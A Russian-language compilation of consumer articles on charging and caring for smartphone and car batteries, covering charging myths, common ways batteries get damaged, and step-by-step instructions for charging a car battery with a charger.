42 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Можно ли испортить аккумулятор зарядным устройством

Эксперты: большинство людей заряжают смартфон неправильно

Как нельзя, а как можно заряжать телефон? И как делать это правильно, чтобы батарея не теряла со временем емкость? Такие вопросы волнуют всех без исключения владельцев смартфонов — ведь именно с недостаточно мощной батареей чаще всего связано недовольство людей любимыми гаджетами. Эксперты сайта Battery University, созданного производителем аккумуляторов Cadex, опубликовали гид по зарядке устройств с разными типами аккумуляторов.

Статья развенчивает мифы, связанные с зарядкой аккумуляторов разных типов, и дает конкретные рекомендации.

Многие считают важным заряжать смартфон, только когда батарея почти опустошена. На самом деле такой подход лишь вредит. Он был верным лет 15 назад, когда в портативную электронику ставили никелевые аккумуляторы. Сейчас их сменили литий-ионные, которые ведут себя совершенно по-другому.

1. Зарядили — отключили

Чаще всего мы подключаем смартфон к зарядному устройству вечером, и оставляем так до утра. Это неправильно. Батареи большинства аппаратов заполнятся в такой ситуации уже часа через три. Оставшиеся часы до утра зарядное устройство будет время от времени подпитывать гаджет, чтобы держать заряд на 100%. Это держит батарею в состоянии “стресса”, ускоренными темпами снижая ее фактическую максимальную емкость.

Через год подобной эксплуатации вы, скорее всего, заметите, что аппарат разряжается быстрее, чем в первый месяц после покупки.

“Когда батарея заряжена — отключите гаджет от зарядника. Это как с мышцами, которые после упражнений следует расслабить, чтобы они не болели”, — рекомендуют эксперты Battery University.

2. Не гонитесь за 100-процентным зарядом

Более того, без особой нужды заполнять литий-ионный аккумулятор на 100% вообще не стоит. “Нет необходимости полностью заряжать литий-ионную батарею, более того, это нежелательно. Лучше подпитывать аккумулятор не до конца, чтобы избежать негативного воздействия высокого напряжения”, — утверждают специалисты.

3. Заряжайте при каждой возможности

Таким образом, чтобы батарея не “стрессовала” и прослужила дольше, лучше подпитывать ее при возможности несколько раз в течение дня. Можно это делать от автомобильного зарядного устройства по дороге на работу и обратно, или в офисе.

Например, разряжаясь каждый раз до нуля и потом заряжаясь до 100%, литий-ионная батарея выдержит всего 500 циклов зарядки. При разрядке-зарядке на 50% срок службы вырастет до полутора тысяч циклов.

Эксперты считают, что максимально продлить жизнь батареи можно, держа уровень заряда между 40 и 80 процентами — именно так эксплуатация будет наиболее эффективной.

Если же вы не собираетесь пользоваться смартфоном какое-то время, лучше всего зарядить его перед этим на 50%.

4. Следите за температурой

При разных температурах батареи чувствуют себя по-разному. На жаре аккумулятор скорее будет испытывать стресс, теряя емкость, и может даже выйти из строя.

Поэтому нужно следить, чтобы летом смартфон не оставался на солнце или, еще хуже, в машине.

Зимой также следует следить, чтобы аккумулятор не переохлаждался. То есть носить его в наружном кармане куртки – плохая идея. А ноутбукам исключительно полезны специальные подставки, обеспечивающие полноценное проветривание нижней панели корпуса.

5. Раз в месяц — “зарядка” разрядкой

Несмотря на все вышесказанное, изредка даже литий-ионным аккумуляторам полезно разряжаться до 0%. Эксперты рекомендуют устраивать смартфону или ноутбуку такую “тренировку” раз в месяц. Она позволит устройству откалибровать электронику, отвечающую за корректное отображение уровня заряда. Без этого при постоянном подпитывании аккумулятора небольшими порциями индикатор заряда начнет “врать”.

В любом случае, слишком переживать из-за того, как заряжать батарею, не стоит. Большинство производителей смартфонов проектируют их в расчете, что покупатель решит заменить свой аппарат на новый через два, максимум — три года. Соответственно, и батареи в смартфонах в принципе не рассчитаны на более продолжительный срок службы. Тем не менее, соблюдение приведенных в статье рекомендаций экспертов позволит батарее смартфона или ноутбука проработать дольше без ощутимых потерь емкости.

Если эта статья показалась вам полезной, поделитесь ею в соцсетях — друзья, которые неправильно заряжают свои смартфоны, скажут вам спасибо.

Источник: Battery University (1),(2)

7 мифов о зарядке аккумуляторов смартфонов

Исследуем самые широко распространенные мифы и заблуждения об одном из самых часто обсуждаемых аспектов мобильной электроники и iPhone с iPad в частности.

Предлагаем распутать клубок противоречивых фактов, разложить всю информацию по полочкам и узнать, как каждый из нас сможет увеличить эффективность и продолжительность работы устройства от одного заряда. Акцент в материале сделан на смартфоны, ноутбуки и другие устройства с несъёмными аккумуляторами.

Миф 1. Батарею нового устройства нужно «прокачать» перед использованием

Этот миф отчасти правдив. Точнее: так могло бы звучать руководство к действию, если вы покупали смартфон лет 5 назад. Чтобы «прокачать» аккумулятор нового устройства, его и правда нужно было разрядить до выключения и зарядить до 100%. Но современные модели не нуждаются в подобной операции. За все смартфоны мира, конечно, ручаться не станем, потому напишем так: если в инструкции к пользованию конкретно вашей модели не описаны подобные манипуляции с аккумулятором, их легко можно опустить.

На заметку: Если в инструкции написано, что нужно разрядить/зарядить батарею полностью, то у меня плохой смартфон? Пункт о первичной перезарядке никоим образом не сказывается на качестве смартфона. Просто в аккумуляторах более продвинутых моделей есть функция калибровки ёмкости и она происходит автоматически, а в вашей модели смартфону ещё нужно показать, каков максимум ёмкости батареи перед началом работы.

Миф 2. Смартфон нельзя оставлять заряжаться на ночь

Якобы таким образом вы повредите аккумулятор и он станет меньше держать заряд. Неправда. Вот чего действительно не стоит делать, так это засыпать с заряжающимся телефоном – вполне вероятно, что остаток ночи он проведёт у вас под подушкой, а это уже попахивает перегревом. В разовом перегреве тоже нет ничего катастрофического, просто высокие температуры ещё не шли на пользу ни одному электронному устройству.

Этот миф, опять же, мог бы относиться к устройствам, выпущенным в предыдущее десятилетие, но сегодня каждый порядочный смартфон точно знает, когда показатель заряда доходит до 100% и после этого отключает приём энергии.

В общем, если вы не собираетесь каждый вечер оставлять телефон на зарядке на ночь, то ничего катастрофического с устройством не произойдёт. А вот системные ночные зарядки могут сократить срок службы аккумулятора – это правда.

Миф 3. Смартфон нужно полностью разряжать перед зарядкой

И снова – неправда. Оптимальный рабочий режим для аккумулятора любого смартфона – между 80% и 40% заряда батареи. То есть умышленно доводить аккумулятор до нуля не нужно. Это даже вредит смартфону: систематическая разрядка аккумулятора быстрее приведёт к деградации батареи, чем при обычном использовании.

На заметку: Даже если на показателе 0% заряда, это не означает, что аккумулятор мертвецки пуст. В смартфонах остаётся заряд для поддержания внутренних процессов.

Миф 4. Неоригинальные зарядные устройства вредны

Это правило наверняка выдумали маркетологи, чтобы бессовестно продавать шнуры, а вместе с ними и адаптеры питания. Нет, это правило также не действует. Исключение, пожалуй, составляют, только последние «яблочные» устройства, которые часто от китайских проводков просто не заряжаются, ибо имеют защиту. В остальном, где и кем был произведен ваш кабель или адаптер – неважно. Обычные шнуры питания подойдут для зарядки аккумулятора любого смартфона. И если бы этот миф действительно был правдой, вся прелесть универсальности стандартов зарядных портов сводилась бы на нет.

Осторожничайте только с ну очень уж дешёвыми кабелями «made in China». Просто потому, что из-за их сомнительного качества может пострадать не только аккумулятор, но и всё устройство – такие шнуры могут запросто не работать, на них может лопаться изоляция или быстро перегибаться проводки, что не есть хорошо.

Официальные аксессуары, вероятней, будут намного качественнее, чем no-name, но на скорости зарядки они не сказываются.

Миф 5. Нельзя пользоваться смартфоном, пока тот заряжается

Это тоже неправда. Всем, думаем, известны фотографии распухшей руки, обгоревших проводков и испорченного смартфона, которые вот уже два года страшат пользователей сети. Но на самом деле зарядка аккумулятора и одновременный запуск игр может разве что нагреть устройство, но никак не сжечь его дотла. Плюс, если заряд аккумулятора низок и вы заряжаете батарею, может случиться, что в процессе игры телефон окончательно сядет – просто потому, что игра съедать заряд батареи будет быстрее, чем пополнять его.

На заметку: Но ведь на фотографиях же реальный сгоревший телефон! Для тех, кто не может угомониться, скажем, что пострадавший при зарядке батареи iPhone 4s был подключён к сети несертифицированным дешёвым кабелем – проблема была в нём, а не в том, что хозяйка аппарата решила кому-то позвонить, не отключив зарядный шнур.

Миф 6. Устройство нужно часто выключать, чтобы батарея хорошо работала

Эту рекомендацию можно переиначить и не воспринимать с фанатизмом. Раз в неделю перезагрузить смартфон можно, но на работе аккумулятора это мало сказывается. Больше – на работе операционной системы. Считайте, это как перезагрузить ПК.

Кстати, в Сети мы встречали и обратное утверждение, что «частое выключение смартфона вредит батарее». Это, ясное дело, тоже не так.

Миф 7. Холод помогает дольше сохранить аккумулятор

Холод, как и аномальная жара только вредят состоянию батареи. Самый частый случай – быстрое снижение заряда аккумулятора на морозе. Вот почему очень советуем электронику зимой носить во внутреннем кармане куртки.

На заметку: Заряд аккумулятора быстро севшего на холоде телефона частично можно реанимировать просто поместив смартфон в тепло – 7-10% заряда таким образом вполне реально вернуть.

10 способов убить хороший аккумулятор

Аккумуляторная батарея автомобиля является очень сложным и уязвимым элементом, несмотря на внешний вид. Это единственное устройство в машине, которое работает благодаря химической реакции внутри батареи. Из-за, этого любой неопытный автолюбитель очень легко может убить хороший аккумулятор.

Давайте разберем 10 самых распространенных способа быстро убить рабочий аккумулятор.

  1. Глубокие разряды АКБ. Когда в автомобиле есть серьезная утечка тока или вы стартером полностью садите батарею, то такие сильные разряды могут убить хороший аккумулятор. Если напряжение на клеммах аккумулятора опустится ниже 10, 8 В, то это грозит переплюсовкой одной из банок батареи. Еще в посаженом аккумуляторе активно развивается процесс сульфатации пластин.
  2. Заряд токами, превышающими номинальное значение в несколько раз. Например, для аккумулятора 60 А/ч номинальным током на зарядном устройстве считается 3-6 А, но никак не 10-12! От слишком большого тока заряда, относительно данной емкости батареи свинцовые пластины и электролит сильно нагреются. Такое «кипячение» может привести к деформации и осыпанию активной массы аккумуляторной батареи.
  3. Следующим распространенным способом вывести аккумулятор из строя является пониженное напряжение бортовой сети машины. Такое часто возникает когда у Вас имеются проблемы с генератором. При постоянной недозаряжености снижается плотность электролита и активно развивается сульфатация свинцовых пластин. Все это ведет к гибели АКБ.
  4. Повышенное напряжение сети автомобиля приведет к систематическому кипению электролита, в следствии перезаряда аккумуляторной батареи. Вода из электролита начинает быстро испарятся, уровень падает и пластины частично оголяются. Активная масса может осыпаться и электролит помутнеет. И Ваш ранее хороший АКБ отправится на прием аккумуляторных батарей.
  5. Загрязнение электролита посторонними веществами. Имеется ввиду, что при обслуживании аккумулятора откручиваются пробки. И нужно следить что бы в открытые банки не попадала грязь. Такие примеси могут испорть рабочую батарею.
  6. Перегрев аккумулятора. Когда электролит внутри батареи перегревается выше 35 0 С, то свинцовые пластины сильно изнашиваются и их может покоробить.
  7. Сильное охлаждение АКБ. Дело в том, что когда аккумулятор сильно разряжен, то электролит становится просто водой. В такой батарейке лед образуется в банках зимой когда температура на улице опустится от -7 0 С и ниже. Лед как известно расширяется и может механически повредить или разрушить активную массу аккумулятора.
  8. Короткое замыканиеаккумулятора. Если ненадолго замкнуть клеммы батареи напрямую, то есть сделать короткое замыкание, это может убить даже самый хороший аккумулятор. Такое обычно происходит в следствии неаккуратного обращения с инструментом. Кладут какой то гаечный ключ на АКБ и не замечают как делают при этом КЗ на клеммах. Ключ сильно нагреется, а аккумулятор может выйти из строя.
  9. Еще один из популярных способа как убить свой аккумулятор быстро, это долить при обслуживании АКБ электролит вместо воды! Запомните, в аккумулятор доливают только дистиллированную воду. Никогда не доливайте электролит или обычную воду! Весь раствор электролита нарушается, пластины покроет коррозия и они быстро разрушатся.
  10. К десятому способу я бы отнес неправильное крепление аккумулятора под капотом. Обязательно нужно закрепить батарею в штатном месте крепежами. Без крепления в процессе эксплуатации автомобиля корпус аккумулятора может повредиться из-за вибрации или удара. Если корпус АКБ треснет и Вы сразу этого не заметите, то такой аккумулятор уже не восстановить.

Давайте заканчивать наш небольшой обзор о том, как чаще всего убивают хороший аккумулятор и идут покупать новый. Надеюсь Вы поняли, что стартерная аккумуляторная батарея автомобиля очень уязвима к экстремальным режимам работы. Поэтому, вовремя делайте проверку, обслуживание и почаще заряжайте аккумулятор. И АКБ Вас никогда не подведет!

Что убивает батарею в вашем iPhone

И как этого избежать.

Симптомы

  • Выключается на морозе?
  • Работает меньше обычного?
  • Отрубается на 20%?
  • Не заряжается до конца?

От этого никто не застрахован. Аккумулятор в айфоне – прямое отражение твоих привычек. Как собственное здоровье, идеально следить за ним невозможно, время от времени приходится тыкать его во всякий треш и фастфуд из мира гаджетов.

Но предотвратить проблемы с батареей iPhone – это запросто. Мы пообщались с экспертами, которые ежедневно решают проблемы аккумуляторов, и узнали, что вредит больше всего.

Что влияет на время работы айфона

1. Плохие зарядки

Что и откуда: зарядки из «перехода», клоны оригиналов
Шанс всё испортить: 70%

Самый очевидный и наиболее частый источник проблем с аккумулятором айфона. Плохая, китайская, дешёвая «зарядка» дома – гарант того, что твой айфон будет мучаться каждый день, растрачивая ресурс в разы быстрее обычного.

Почему так? Дешёвые зарядки (да и некоторые дорогие) сделаны грубо, из самых простых комплектующих с низким контролем качества производства. Такие блоки очень часто неспособны адекватно регулировать напряжение – и большая нагрузка при скачке напряжения или любой проблемы с сетью, ложиться на первичную цепь питания в устройстве. Минимум – Tristar или ключ зарядки, максимум – процессор.

И, конечно, снижается время автономной работы по причине повреждения микросхем – они завышают потребление и могут до исправления сильно высадить аккумулятор.

Как определить, что у тебя китайская зарядка? Если купил «оригинал» за 400 рублей или какой-нибудь Interstep в «Евросети», можешь уже начинать молиться (или выкидывать в мусорку). Запомни правило номер один: всегда старайся пользоваться оригинальным блоком. Нет такого – тогда не экономь. Потом сам же будешь за это платить.

2. Автомобильные зарядки

Что и откуда: откуда хочешь, почти везде всё ужасно
Шанс всё испортить: примерно 99%, если у тебя есть авто

Среди мастеров-ремонтников автомобильные зарядки – сродни ругательству и оскорблению. Ребята знают, что это вредно, но минздрав предупреждать не спешит.

Apple не кладёт автозарядку в комплект айфона, поэтому приходится докупать. А что обычно приобретают автовладельцы? Правильно – хрень чёрного цвета со светодиодом и грубо вырезанным USB-портом. Универсально, дёшево, нормально работает, «я что, для тачки буду за тыщу зарядку брать, лох, что ли?»

Выходит, что да, «лох».

Почему? Потому что прикуриватель в автомобиле – это вам не розетка со стабильным напряжением. Каждое зарядное устройство для авто должно быть качественным дважды: не только правильно преобразовывать и держать одно напряжение, но и соответствовать спецификациям конкретного смарта. Универсальные зарядки так не умеют почти никогда.

Что особенно плохо, владельцы авто пользуются такими зарядками ежедневно – айфон слишком мало работает, чтобы пренебрегать такой возможностью. А значит, смартфон практически постоянно подвержен скачкам напряжения.

Практически все доступные автомобильные з/у вредят айфону – мучают цепь питания похлеще домашних аналогов. Пожалуйста, купите себе нормальную, качественную, НЕ УНИВЕРСАЛЬНУЮ зарядку в нормальном магазине. Принципиально не даю ссылок, это не реклама, а предупреждение.

3. Портативные аккумуляторы noname

Что и откуда: никогда не узнаешь – кот в мешке
Шанс всё испортить: 60%, если не повёзёт

Обидно признавать, но это факт. Рынок портативных аккумуляторов – тёмный лес, в котором каждый делает, что хочет.

Есть три типа аккумуляторов на рынке:

1. Трэш с Aliexpress.
2. Noname, что продают в российских магазинах
3. Xiaomi Powerbank, Samsung, LG

У большинства людей дома лежит девайс из первой категории или второй, которая зачастую является просто перепакованной первой. К ней не может быть доверия. Достаточно того, что китайцы почти всегда ставят случайные цифры ёмкости батарей (всякие 24000 мАч обычно равны максимум 5000).

Ещё они могут вздуваться или гореть из-за плохой сборки. Но это так, верхушка айсберга, потому что дальше – хуже.

Почему? Мало кто задаётся вопросом, насколько качественная электроника стоит в портативных аккумуляторах. По опыту мастеров, разобравших не один такой девайс – электроника там стоит отвратительная, не сильно лучше, чем в тех же китайских зарядных устройствах. В итоге сталкиваемся с той же проблемой: рано или поздно повредится цепь питания, а дальше может быть всё, что угодно.

Как определить, что у тебя плохой портативный аккумулятор? Если ваш телефон очень сильно нагревается от него, но не от оригинальной зарядки; если аккумулятор не может зарядить телефон до 100%; если он заряжается по 5-6 часов, а хватает его буквально на одну полную зарядку – купите, наконец, нормальный, а свой отдайте врагу.

Между прочим, от некоторых моделей Xiaomi Powerbank тоже нехило нагреваются айфоны. Как, почему, что делать – никто не знает. Apple, выпусти уже нормальную внешнюю батарейку!

4. Использование на холоде и жаре

Что и откуда: когда слишком холодно или жарко
Шанс всё испортить: 99%

В Apple работают крутые ребята, но простейшие физику и химию никто не отменял. Каждый владелец смартфона должен знать: ёмкость любого аккумулятора снижается на морозе или при сильной жаре. Причём чем дольше используешь аккум, тем сильнее он слабеет в таких условиях.

Именно поэтому жалобы на проблемы с АКБ в айфонах растут в геометрической прогрессии с наступлением зимы или лета. Причём чаще всего несут в ремонт девайсы, купленные год назад или ещё раньше. Симптомы простые: у кого-то отключается на 20%, у многих заряд тает на глазах.

Использование айфона на открытом холоде при температуре минус 20 – редкая ситуация, всё-таки носим девайсы мы в кармане или в сумке, а там теплее. Зато гораздо проще нанести серьёзный вред летом, под прямыми лучами солнца на держателе в автомобиле. Или на пляже.

Что делать? Старайтесь не вытаскивать айфон под солнце на долгое время, не оставлять девайс рядом с окном летом, не увлекаться его использованием на холоде. В общем, избегать жестокого холода и жары. Всего понемножку, без экстрима – и аккумулятор не разочарует даже спустя год после покупки айфона.

5. Падения и повреждения телефона

Что и как: это тяжело, но реально
Шанс всё испортить: 10%, но зато наверняка

Все мы когда-нибудь роняли айфоны. Часто отделываемся мелкой царапкой или вмятиной, которая вроде бы ничего не меняет.

Но сильный удар по аккумулятору обычно не проходит бесследно. Мало того, что любое сильное физическое воздействие снижает срок службы (хоть и немного), оно может повредить электронику.

Полно микросхем, которые могут пострадать. Также есть обвязки и слои текстолита, которые при повреждении получают трещины и тем самым дают обрыв контактных соединений. Обвязка (транзистор, варистор, конденсатор, ключ) просто отлетает при сильных ударах. В некоторых моделях iPhone шлейф аккумулятора закреплён хуже, и иногда после падения девайс может отказаться включиться.

Мастерам известны случаи, когда после сильных падений аккумулятор в айфоне начинал раздуваться, давя на экран изнутри. Постепенно это ведёт к повреждению матрицы, после которого придётся заменять весь модуль дисплея. Мало того, всё это время ты носишь настоящую зажигательную бомбу в кармане. Но такое всё-таки бывает редко, надо постараться.

Так или иначе, тут всё просто. Носите защитный чехол, и не из пластика, а силикона (например, оригинальный). А если чехлы – не ваша тема, просто старайтесь не ронять.

Как решать проблемы с аккумулятором?

Предположим, вас беспокоит слишком раннее отключение iPhone. Или он нереально быстро разряжается. Или просто вашему смартфону уже два-три года, и ресурс батареи ожидаемо начал падать.

(4.50 из 5, оценили: 8)

Заряжаем аккумулятор! Инструкция для новичков и блондинок

Автомобильнлые аккумуляторы остаются заряженными благодаря использованию дополнительной мощности двигателя автомобиля. Большинство из них могут работать в течение пяти лет без необходимости замены или перезарядки. Но даже лучшие АКБ со временем разряжаются преждевременно, если вы оставляете свет включенным слишком долго. Очень неудобна ситуация, когда батарея неожиданно разрядилась. Но даже неопытный автолюбитель легко сможет подзарядить АКБ с помощью инструкции, которую подготовили для вас мы в 7vaz.ru.

Подготовительные работы

Наденьте подходящее защитное снаряжение

Безопасность имеет первостепенное значение всегда, когда вы обслуживаете или эксплуатируете свой автомобиль. Начните с того, что наденьте защитные очки, которые защитят вас от попадания искр или аккумуляторной жидкости. Также советуется использовать перчатки. Убедитесь, что помещение, в котором выполняются работы, хорошо проветривается и достаточно освещено.

Перчатки использовать не обязательно. Но они могут защитить вас от незначительных защемлений и порезов во время работы с автомобилем.

Убедитесь, что поблизости нет детей, пока вы подзаряжаете АКБ автомобиля, так как может возникнуть искра, если нечаянно соприкоснуться друг с другом «плюсовый» и «отрицательный» кабели.

Определите, какая у вас батарея

Чтобы правильно зарядить аккумулятор, вы должны сначала определить тип АКБ, который у вас есть. Обычно вы можете найти описание где-то на батарее. Иногда может понадобиться зайти на сайт производителя, если этикетка слишком изношена, чтобы прочесть на ней информацию.

Вам нужно также узнать напряжение аккумулятора на этикетке или в руководстве по эксплуатации вашего автомобиля.

Приобретите зарядное устройство для автомобиля

Выберите зарядное устройство, которое подходит для вашего АКБ. Большинство зарядных устройств универсальны и подходят для всех типов аккумуляторов, кроме гелевых. Существуют быстрые зарядные устройства, которые могут зарядить батарею быстро и даже обеспечат вам быстрый старт. Также бывают струйные зарядные устройства, которые заряжают медленно, но более качественно.

На многих современных устройствах установлен микропроцессор, позволяющий контролировать степень зарядки АКБ. Это очень удобно, так как процесс останавливается автоматически после того, как батарея полностью зарядилась.

Более простые и старые модели нужно останавливать вручную, чтобы не допустить опасной перезарядки. Не стоит оставлять их без внимания на долгое время в подключенном состоянии.

  • Прочитайте инструкцию по эксплуатации вашего зарядного устройства, чтобы убедиться, что вы правильно его используете.
  • Даже современные цифровые модели должны тщательно контролироваться в процессе зарядке, чтобы убедиться, что они функционируют должным образом и останавливаются перед перезарядкой аккумулятора.

Отсоедините и снимите АКБ

Важно отсоединить аккумулятор перед его подзарядкой. Часто обстоятельства позволяют зарядить батарею, не вынимая ее из автомобиля. Но многие автолюбители все же достают устройство из подкапотного пространства и относят его домой или в помещение, где есть электрическая розетка.

Внимание! Всегда сначала отсоединяйте «минусовую» клемму, а затем «плюсовую».

Очистите клеммы

Любая грязь на клеммах батареи может помешать зарядным кабелям установить прочное соединение с ее элементами, поэтому важно тщательно их почистить. Используйте пищевую соду и влажную ткань или наждачную бумагу, чтобы стереть грязь или ржавчину. Перед переходом к следующему шагу убедитесь, что металлические клеммы полностью очищены.

  • Иногда вы можете обнаружить, что батарея полностью заряжена, но грязные клеммы просто препятствовали прохождению электричества.
  • Не беритесь за клеммы голыми руками, особенно если на них виден белый порошок. Возможно это серная кислота, которая может обжечь кожу при соприкосновении с ней.

Как правильно зарядить аккумулятор

Поместите зарядное устройство на устойчивую поверхность

Никогда не ставьте зарядное устройство непосредственно на батарею, так как оно может соединить отрицательные и положительные клеммы, что приведет к повреждению батареи и зарядного устройства и, возможно, даже к пожару. Вместо этого поместите зарядное устройство на устойчивую поверхность настолько далеко от батареи, насколько позволяют кабели. Перед подключением зарядного устройства к стене убедитесь, что помещение хорошо проветривается. Откройте дверь гаража или окна, если вы находитесь в помещении.

  • Убедитесь, что поверхность, на которой вы устанавливаете зарядное устройство, прочная, чтобы предотвратить его падение или отсоединение от клемм.
  • Используйте всю длину кабелей, чтобы максимально дальше разместить АКБ от зарядного устройства.

Подключите зарядное устройство к аккумулятору

Подсоедините черный кабель от зарядного устройства с отрицательным знаком (-) к отрицательному выводу на аккумуляторе, отмеченному тем же символом. Затем подключите красный кабель с положительным знаком (+) к положительному выводу на АКБ с соответствующим символом. Обязательно проверьте соединения перед подключением или включением зарядного устройства, так как смешивание положительных и отрицательных клемм может привести к повреждению аккумулятора или даже к пожару. [8]

  • Некоторые автомобили могут маркировать положительный терминал буквами POS вместо положительного (+) символа и NEG вместо отрицательного (-).
  • Убедитесь, что кабели надежно подключены, чтобы обеспечить прохождение электричества от зарядного устройства к аккумулятору.

Настройте зарядное устройство

Цифровые зарядки могут показывать уровень напряжения в батарее и позволяют устанавливать желаемый уровень напряжения. Старые же модели позволяют лишь включать и выключать процесс зарядки.

Скоростные зарядные устройства также дают возможность выбирать скорость, с которой вы хотите зарядить батарею (часто изображается в виде черепахи для медленного заряда и кролика для быстрого).

Быстрая зарядка хороша для автомобильного аккумулятора, который недавно разрядился из-за того, что вы оставили свет включенным или что-то в этом роде. Если же аккумулятор разряжался на протяжении длительного времени, может потребоваться более долгий процесс зарядки, прежде чем его можно будет использовать.

  • Если устройство позволяет установить желаемое напряжение батареи, поставьте значение, указанное на этикетке.
  • Никогда не ставьте зарядное устройство в режим быстрой зарядки, если вы планируете оставить его без присмотра.
  • Если выбран режим медленной зарядки, аккумулятор можно оставлять без присмотра на всю ночь.

Существует два режима зарядки: постоянным током или постоянным напряжением. Первый способ считается более эффективным, ведь он не требует контроля. Второй способ проще, но позволяет зарядить АКБ только до 80 процентов.

Некоторые дорогие модели зарядки дают возможность воспользоваться комбинированным методом, благодаря которому участие человека сводится к минимуму.

Как заряжать постоянным током

  1. Установить напряжение в 10 процентов от емкости АКБ и заряжайте до тех пор, пока напряжение не повысится до 14,4 В. Например, если емкость АКБ 60 Ач, то заряжают его током около 6 Ампер.
  2. Затем нужно уменьшить ток в два раза (в нашем примере до 3 Ампер), чтобы понизить степень кипения.
  3. Как только уровень напряжение станет равным 15 В, снова в два раза сокращаем ток и продолжаем процесс зарядки, пока значение тока и напряжение не перестанут меняться.

Как заряжать постоянным напряжением

Процесс зарядки протекает намного проще. Нужно только установить уровень напряжение 14,5 В и ожидать. Процесс зарядки может длиться до 24 часов, емкость батареи будет восполнена только до 80 процентов. Но зато не возникнет необходимости контролировать процесс и находиться рядом.

Проверьте АКБ

После того, как батарея зарядится, проверьте, работает ли она. Некоторые цифровые зарядные устройства дают информацию о том, правильно ли батарея держит заряд и нужно ли ее заменить. Часто это может быть указано в процентах. Например, значение 100% значит, что в аккумуляторе 100 процентов заряда.

Также вы можете воспользоваться вольтметром, чтобы измерить напряжение в батареи после ее отсоединения от зарядки. Для этого нужно прикоснуться к положительному и отрицательному кабелям от вольтметра к соответствующим клеммам. Если аккумулятор все еще находится на автомобиле, самый верный способ проверить его работоспособность – это подключить его снова и попытаться завести авто.

  • Если вольтметр показывает количество вольт, которое соответствует батарее, зарядное устройство в порядке и им можно пользоваться для запуска транспортного средства.
  • Если же вольтметр показывают, что аккумулятор быстро разряжается или автомобиль не заводится, это свидетельствует о других проблемах или о необходимости заменить батарею.

В некоторых случаях нет возможности ждать, и нужно запустить автомобиль как можно быстрее. В этом случае можно «прикурить» его от другого автомобиля. Как это сделать подробно описано в пошаговом руководстве на сайте 7vaz.ru

Устранение неисправностей батареи

Проверьте работоспособность аккумулятора в магазине автозапчастей

Если вы заряжали аккумулятор с помощью зарядного устройства или другого транспортного средства, но ваш автомобиль по-прежнему не заводится, извлеките аккумулятор (если вы этого еще не сделали) и отнесите его в местный магазин автозапчастей. Там можно зарядить батарею и проверить, нормально ли она работает, можно ли ее обслужить или лучше заменить на новую.

Если аккумулятор не требует технического обслуживания, вам придется заменить его в случае, если не держится заряд.

  • Если батарея плохая, вам нужно будет приобрести замену.
  • Если аккумулятор полностью заряжен и работает нормально, но автомобиль не заводится, проверьте кабели батареи, чтобы убедиться, что они не повреждены, и надежно подключите их к клеммам.

Проверьте генератор

Неисправный генератор переменного тока может помешать вашему автомобилю в достаточной степени заряжать аккумулятор, чтобы запускать авто снова. Иногда он не производит достаточного количества электричества, чтобы поддерживать даже движение автомобиля.

Вы должны проверить, нет ли проблем у генератора переменного тока. Для этого запустите автомобиль, а затем отсоедините положительную клемму аккумулятора. Работающий должным образом генератор будет производить достаточно электричества, чтобы поддерживать работу автомобиля без аккумулятора. Но если двигатель перестает работать, скорее всего генератор нуждается в замене.

  • Иногда можно обнаружить проблему с генератором, обратив внимание на освещение салона. Если при нажатии на педаль газа освещение начинает светить ярче, а затем, когда вы убираете ногу, снова тускнеет, генератор работает плохо.
  • Если снять генератор с автомобиля, то во многих магазинах автозапчастей могут его проверить и убедиться, нужна ли для него замена.

Прислушайтесь к звукам

Если автомобиль не заводится, но при попытке выдает слышимый щелчок, вероятно в аккумуляторе недостаточно заряда для запуска. Это может быть связано с тем, что он не заряжен должным образом или батарея слишком износилась, чтобы удерживать заряд. Попробуйте снова запустить авто или проверьте батарею.

  • Убедитесь, что у вас хорошее соединение с аккумулятором во время зарядки, иначе батарея не сможет завести автомобиль.
  • Щелчок указывает на то, что в батарее есть немного электричества, но его недостаточно для запуска двигателя.

Если автомобиль глохнет

Если автомобиль запускается после зарядки аккумулятора, но глохнет вскоре после запуска, это может быть связано с генератором переменного тока. Если он запустится снова или продолжит вращаться, но не сможет запуститься, проблема не в электричестве. Скорее всего проблемы возникли с доставкой топлива или воздуха.

  • Чтобы двигатель правильно работал, к нему должно поступать не только электричество, но и топливо и воздух.
  • Скорее всего нужно отвезти машину к механику, чтобы определить источник проблемы и устранить его.

Как правильно зарядить аккумулятор автомобиля зарядным устройством?

Владельцев новых автомобилей не волнует вопрос заряда аккумулятора. Разумеется, если техника эксплуатируется в соответствии с инструкцией. Но уже через 3-5 лет АКБ изнашивается, и может подвести в самый неподходящий момент.

Или вы слишком долго слушали музыку в гараже, с выключенным мотором. А может быть оставили включенными фары головного света на ночь. Причин для незапланированного разряда аккумулятора достаточно.

И далеко не всегда удается «прикурить» от другого автомобиля, и восстановить работоспособность от штатного генератора. Для этого придется проехать на высоких оборотах несколько сотен километров.

Не надо отчаиваться. Всегда можно зарядить аккумулятор автомобиля зарядным устройством, даже если уровень напряжения опустился ниже критического. Поэтому такой прибор должен быть в арсенале автолюбителя.

Как правильно подзарядить аккумулятор?

Универсального ответа на этот вопрос нет. Общее правило следующее: продолжительная зарядка меньшим током более полезна для АКБ, чем ускоренный заряд высоким током. Однако такой режим не всегда возможен. Иногда требуется в срочном порядке восстановить работоспособность перед выездом.

Сколько времени заряжать аккумулятор автомобиля чтобы не перезарядить? Подробности в этом видео

Да и штатная система подзарядки далека от совершенства: даже при нормальной работе регулятора напряжения, продолжительность поездки разная. В результате АКБ на эксплуатируемом авто заряжается рывками, бессистемно.

Существует несколько способов автономной зарядки

Оптимальный ток заряда

Не должен превышать 10% от емкости батареи. То есть, если у вас аккумулятор 60СТ (емкость 60Ач), правильный ток заряда не должен превышать 6А. Таким током вы заряжаете АКБ, если времени для восстановления достаточно много.

Экспресс метод

Если вам надо быстро зарядить аккумулятор зарядным устройством (срочный выезд), можно ускоренно восстановить емкость, достаточную для старта двигателя.

В таком случае ток заряда составляет 25-40 % от емкости. Вы сообщите батарее требуемый заряд за 30-50 минут. Но такой способ фактически убивает пластины аккумулятора. Поэтому пользоваться им можно только в исключительных случаях.

Минимальный ток

Достаточный лишь для того, чтобы преодолеть внутреннее сопротивление аккумулятора. Таким током можно заряжать АКБ в течение нескольких суток, или поддерживать уровень заряда при хранении.

Чтобы знать, как правильно зарядить аккумулятор автомобиля зарядным устройством, необходимо научиться определять остаточную емкость. Понятное дело, если у вас автоматический зарядник, контролировать процесс нет необходимости.

Вы просто увидите сигнальное сообщение (или изменившийся цвет индикатора). При этом процесс заряда будет остановлен.

